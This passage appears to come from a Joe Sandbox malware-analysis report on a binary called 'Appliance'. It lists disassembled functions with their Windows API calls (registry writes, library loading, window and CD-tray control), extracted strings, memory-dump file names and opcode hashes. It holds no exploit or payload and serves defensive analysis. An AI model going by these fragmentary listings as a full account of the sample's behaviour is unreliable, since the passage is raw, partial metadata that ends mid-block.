                                                                                                                                            • Opcode ID: d67b1e1901071e04215d8e0d764acd6203a8da47fc26b4a5fa147c8836ff58ce
                                                                                                                                            • Instruction ID: dfcf61553ddb1c2f9147f0016fb5d251c1bc5c1586cc2699371c56f1eb847e43
                                                                                                                                            • Opcode Fuzzy Hash: d67b1e1901071e04215d8e0d764acd6203a8da47fc26b4a5fa147c8836ff58ce
                                                                                                                                            • Instruction Fuzzy Hash: 047189B2D04219AFDF28DFA5EC84FAEBBB9AF14315F144565E904F6290D7309A05CBA0
                                                                                                                                            APIs
                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4CF1D
                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E5DCD0,00000000,?,00000000,?,?), ref: 00E4CFA4
                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00E4D004
                                                                                                                                            • _wcslen.LIBCMT ref: 00E4D054
                                                                                                                                            • _wcslen.LIBCMT ref: 00E4D0CF
                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00E4D112
                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00E4D221
                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00E4D2AD
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00E4D2E1
                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E4D2EE
                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00E4D3C0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                            • API String ID: 9721498-966354055
                                                                                                                                            • Opcode ID: 5e00bcee4891d16228c162d81f1b54f7a46210c568dbd13ad9f78ec4eb3ea37c
                                                                                                                                            • Instruction ID: cba8dd3c170b9c017d8b11285108e0f87e16a046a3023fcdb29f8cd8f182a629
                                                                                                                                            • Opcode Fuzzy Hash: 5e00bcee4891d16228c162d81f1b54f7a46210c568dbd13ad9f78ec4eb3ea37c
                                                                                                                                            • Instruction Fuzzy Hash: 1B1259356042019FCB14DF15D881F2AB7E6EF88714F14885DF98AAB3A2CB31ED45CBA1
                                                                                                                                            APIs
                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00E51462
                                                                                                                                            • _wcslen.LIBCMT ref: 00E5149D
                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E514F0
                                                                                                                                            • _wcslen.LIBCMT ref: 00E51526
                                                                                                                                            • _wcslen.LIBCMT ref: 00E515A2
                                                                                                                                            • _wcslen.LIBCMT ref: 00E5161D
                                                                                                                                              • Part of subcall function 00DDFD52: _wcslen.LIBCMT ref: 00DDFD5D
                                                                                                                                              • Part of subcall function 00E23535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E23547
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                                                            • Opcode ID: b990ed808cefade8e0ff02a26d82e19a5571749983d5314af12f448e2fb32bdf
                                                                                                                                            • Instruction ID: f8fd7992e9436f2b78dd463208c74cc4eb41e3847333a8cacd0cb98925d28228
                                                                                                                                            • Opcode Fuzzy Hash: b990ed808cefade8e0ff02a26d82e19a5571749983d5314af12f448e2fb32bdf
                                                                                                                                            • Instruction Fuzzy Hash: F4E1D0356083018FCB14EF24C450A6AB7E2FF94314B14599DFC96AB3A1DB30ED49CBA1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                            • API String ID: 1256254125-909552448
                                                                                                                                            • Opcode ID: 527bf2ce9f22c49fb5ecbae333a7c75457abbbe5aea572e3704edcba3f032e21
                                                                                                                                            • Instruction ID: e81377ac97b122713dc38c95e225e3d49d3839f63718ecdcce245c894c05710f
                                                                                                                                            • Opcode Fuzzy Hash: 527bf2ce9f22c49fb5ecbae333a7c75457abbbe5aea572e3704edcba3f032e21
                                                                                                                                            • Instruction Fuzzy Hash: C9711A326081168BCB10AF7CED015FF33A1AB6075CB612129FC2AB7294EE35DD458770
                                                                                                                                            APIs
                                                                                                                                            • _wcslen.LIBCMT ref: 00E58DB5
                                                                                                                                            • _wcslen.LIBCMT ref: 00E58DC9
                                                                                                                                            • _wcslen.LIBCMT ref: 00E58DEC
                                                                                                                                            • _wcslen.LIBCMT ref: 00E58E0F
                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E58E4D
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E56691), ref: 00E58EA9
                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E58EE2
                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E58F25
                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E58F5C
                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00E58F68
                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E58F78
                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,00E56691), ref: 00E58F87
                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E58FA4
                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E58FB0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                                            • API String ID: 799131459-1154884017
                                                                                                                                            • Opcode ID: b0913cfeee10a3f7827938ac93f6042ed95bb1af573be67d3206cbfe2d5ac50e
                                                                                                                                            • Instruction ID: ee73a5073854792ad8c929921a8410d896dec835a01aedb1f6ffa13110cbf416
                                                                                                                                            • Opcode Fuzzy Hash: b0913cfeee10a3f7827938ac93f6042ed95bb1af573be67d3206cbfe2d5ac50e
                                                                                                                                            • Instruction Fuzzy Hash: 7861DF71A00219BEEB289F65CD42BBE77A8EB08B16F104906FD15F60D1DF749958CBB0
                                                                                                                                            APIs
                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00E3493D
                                                                                                                                            • _wcslen.LIBCMT ref: 00E34948
                                                                                                                                            • _wcslen.LIBCMT ref: 00E3499F
                                                                                                                                            • _wcslen.LIBCMT ref: 00E349DD
                                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00E34A1B
                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E34A63
                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E34A9E
                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E34ACC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                            • API String ID: 1839972693-4113822522
                                                                                                                                            • Opcode ID: 48d954b23ad6a6bd9cef2342f2d71a5783062aeac944e340eb014d437df2f646
                                                                                                                                            • Instruction ID: e3fd5a81ca5c52af695c0d0553006d01df777afa67e10e51931683eb991d20bf
                                                                                                                                            • Opcode Fuzzy Hash: 48d954b23ad6a6bd9cef2342f2d71a5783062aeac944e340eb014d437df2f646
                                                                                                                                            • Instruction Fuzzy Hash: DA71E9B25083029FC710EF34C841A6BBBE4EF98758F10592DF49AA7291EB31ED45CB61
                                                                                                                                            APIs
                                                                                                                                            • LoadIconW.USER32(00000063), ref: 00E26395
                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E263A7
                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00E263BE
                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00E263D3
                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00E263D9
                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00E263E9
                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00E263EF
                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E26410
                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E2642A
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00E26433
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2649A
                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00E264D6
                                                                                                                                            • GetDesktopWindow.USER32 ref: 00E264DC
                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00E264E3
                                                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E2653A
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00E26547
                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E2656C
                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E26596
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 895679908-0
                                                                                                                                            • Opcode ID: e145b26e8ca5ecfa573230c9d21bc3c484f273c26b56e45e69dccb514e95bd8b
                                                                                                                                            • Instruction ID: 4f5612ab08a40af143d9b3406bb2154193d3217c78014006de5a4990bd24b1a4
                                                                                                                                            • Opcode Fuzzy Hash: e145b26e8ca5ecfa573230c9d21bc3c484f273c26b56e45e69dccb514e95bd8b
                                                                                                                                            • Instruction Fuzzy Hash: FE71CC31900719AFDB20DFA9DE85AAEBBF5FF48709F100A18E196B25A0C770E944CB50
                                                                                                                                            APIs
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00E40884
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00E4088F
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00E4089A
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00E408A5
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00E408B0
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00E408BB
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00E408C6
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00E408D1
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00E408DC
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00E408E7
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00E408F2
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00E408FD
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00E40908
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00E40913
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00E4091E
                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00E40929
                                                                                                                                            • GetCursorInfo.USER32(?), ref: 00E40939
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E4097B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                            • Opcode ID: bc42e2506c646cab991d3415205e1cf4837f200ec66380c427ac5fe9be6183d6
                                                                                                                                            • Instruction ID: 6d22421722c8d968421245beaa7b7be25d3c2a33af8d7f62ec7cd50aa2afc009
                                                                                                                                            • Opcode Fuzzy Hash: bc42e2506c646cab991d3415205e1cf4837f200ec66380c427ac5fe9be6183d6
                                                                                                                                            • Instruction Fuzzy Hash: 184151B0D483196ADB109FBA9C89C6EBFA8FF44754B50452AA15CE7281DB78D801CFA1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen
                                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
                                                                                                                                            • API String ID: 176396367-2171760788
                                                                                                                                            • Opcode ID: 8b8b47cc91d502202bf73f055343ef1f0b9446b76d96884b29047e90f4b1c65c
                                                                                                                                            • Instruction ID: 0afd4dc5b27afe4fe56f6198f5b5aa7d6aa26ec8ed30194ffcd545619ddb154f
                                                                                                                                            • Opcode Fuzzy Hash: 8b8b47cc91d502202bf73f055343ef1f0b9446b76d96884b29047e90f4b1c65c
                                                                                                                                            • Instruction Fuzzy Hash: F8E10532A006269BCB14AF74D8427EDFBB1FF54714F14512AE45AF7250DB34AE898FA0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00E59BA3
                                                                                                                                              • Part of subcall function 00E580AE: ClientToScreen.USER32(?,?), ref: 00E580D4
                                                                                                                                              • Part of subcall function 00E580AE: GetWindowRect.USER32(?,?), ref: 00E5814A
                                                                                                                                              • Part of subcall function 00E580AE: PtInRect.USER32(?,?,?), ref: 00E5815A
                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00E59C0C
                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E59C17
                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E59C3A
                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E59C81
                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00E59C9A
                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00E59CB1
                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00E59CD3
                                                                                                                                            • DragFinish.SHELL32(?), ref: 00E59CDA
                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00E59DCD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$($(
                                                                                                                                            • API String ID: 221274066-1080139498
                                                                                                                                            • Opcode ID: c23b26a1b866fa09aab8271a31fa84a0b250917d3ea47168856ff86ea2662856
                                                                                                                                            • Instruction ID: 850ead03f685b5f1b7e24e56df81899a7c39857742e795263c6956d9ce8c4af4
                                                                                                                                            • Opcode Fuzzy Hash: c23b26a1b866fa09aab8271a31fa84a0b250917d3ea47168856ff86ea2662856
                                                                                                                                            • Instruction Fuzzy Hash: 0C616A71108301AFC715EF61CC85E9FBBE8EF88751F40091EF695A31A1DB309A49CB62
                                                                                                                                            APIs
                                                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00DE0436
                                                                                                                                              • Part of subcall function 00DE045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00E9170C,00000FA0,B4417AB3,?,?,?,?,00E02733,000000FF), ref: 00DE048C
                                                                                                                                              • Part of subcall function 00DE045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E02733,000000FF), ref: 00DE0497
                                                                                                                                              • Part of subcall function 00DE045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E02733,000000FF), ref: 00DE04A8
                                                                                                                                              • Part of subcall function 00DE045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00DE04BE
                                                                                                                                              • Part of subcall function 00DE045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DE04CC
                                                                                                                                              • Part of subcall function 00DE045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DE04DA
                                                                                                                                              • Part of subcall function 00DE045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DE0505
                                                                                                                                              • Part of subcall function 00DE045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DE0510
                                                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00DE0457
                                                                                                                                              • Part of subcall function 00DE0413: __onexit.LIBCMT ref: 00DE0419
                                                                                                                                            Strings
                                                                                                                                            • SleepConditionVariableCS, xrefs: 00DE04C4
                                                                                                                                            • InitializeConditionVariable, xrefs: 00DE04B8
                                                                                                                                            • WakeAllConditionVariable, xrefs: 00DE04D2
                                                                                                                                            • kernel32.dll, xrefs: 00DE04A3
                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00DE0492
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                            • API String ID: 66158676-1714406822
                                                                                                                                            • Opcode ID: 1e31697397f294f9708684b68c464d054baa15aa586812ea628598a698a8f948
                                                                                                                                            • Instruction ID: 106fa0284430c80331ff2bee4837bdb27dea6c30c0321ccbca34442c496664e8
                                                                                                                                            • Opcode Fuzzy Hash: 1e31697397f294f9708684b68c464d054baa15aa586812ea628598a698a8f948
                                                                                                                                            • Instruction Fuzzy Hash: 8D212C326457556FD7243BA6AD05B6A3B94DB05BA2F040516F901B72C0DBF08884CA71
                                                                                                                                            APIs
                                                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,00E5DCD0), ref: 00E34F6C
                                                                                                                                            • _wcslen.LIBCMT ref: 00E34F80
                                                                                                                                            • _wcslen.LIBCMT ref: 00E34FDE
                                                                                                                                            • _wcslen.LIBCMT ref: 00E35039
                                                                                                                                            • _wcslen.LIBCMT ref: 00E35084
                                                                                                                                            • _wcslen.LIBCMT ref: 00E350EC
                                                                                                                                              • Part of subcall function 00DDFD52: _wcslen.LIBCMT ref: 00DDFD5D
                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00E87C10,00000061), ref: 00E35188
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                                                            • Opcode ID: 14d9c45c9eef71bc935030df799aaf8ffcc6a1a3f32b128caef7d2f67b7a4963
